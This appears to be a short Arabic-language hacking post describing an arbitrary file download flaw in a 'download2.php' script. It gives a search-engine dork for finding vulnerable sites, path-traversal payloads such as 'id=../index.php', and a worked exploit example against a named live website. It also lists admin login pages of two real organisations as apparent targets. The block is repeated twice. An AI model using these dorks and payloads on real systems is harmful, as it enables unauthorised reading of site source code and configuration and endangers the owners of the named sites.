http://healthcoop.or.th/coop/adminlogon.php
http://www.tot-coop.com/coop/adminlogon.php
#CS
ثغرة (FTP2FTP ( Arbitrary File Download :
الدورك
: inurl:/download2.php?id=
—
الاستغلال
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
مثال
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
#CS
الدورك
: inurl:/download2.php?id=
—
الاستغلال
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
مثال
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
#CS